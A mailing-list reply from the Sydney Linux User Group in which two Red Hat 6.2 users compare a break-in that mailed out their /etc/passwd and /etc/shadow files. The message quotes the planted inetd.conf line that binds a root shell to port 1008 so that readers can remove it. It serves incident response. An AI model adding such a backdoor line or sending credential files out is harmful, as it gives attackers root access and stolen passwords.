> This occurred to me as well last night - I think around 3am. Similarly, it
> was discovered because the mail destination domain could not be found.
> However, I think this is because somewhere in teh process of getting in,
> they broke my local named (i wasnt working in the morning) - that or
> somewhere upstream someone hurt DNS - I was getting a lot of "Lame server
> errors". The email contained the output of ifconfig and the contents of
> /etc/passwd and /etc/shadow.
My local named seemed ok. Contents of my email exactly as you describe.
> The ISP I was on was Telstra bigpond - if its the same, maybe they were
> scanning that range of addresses.
I was on ihug.
> The other change I found was the following entry on the end of
> /etc/inetd.conf:
> 1008 stream tcp nowait root /bin/sh sh
>
> which you may want to check for and remove/comment.
That's in mine too! Now commented.
> I am thinking it could have been the BIND exploit coming active, but not
> sure (I havent upgraded yet, and my listen-on clause was broken -
> now fixed not to listen outside).
>
> The fact taht they edited /etc/inetd.conf and cat-d shadow indicates root
> priveleges. However, there doesnt seem to be any evidence of things inside
> or other changes, so possibly a buffer of exploit type deal?
>
> I run RH6.2 btw :)
So do I.
> The only services i had running out of inetd were ftp, telnet and auth
> (first 2 are shut down until i get home to tighten things) - not portmap.
>
> Makes you wonder if one should send an edited email with prepared IP and
> ready a box to trace what happens :)
Was your email also addressed to [EMAIL PROTECTED]?
--
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug
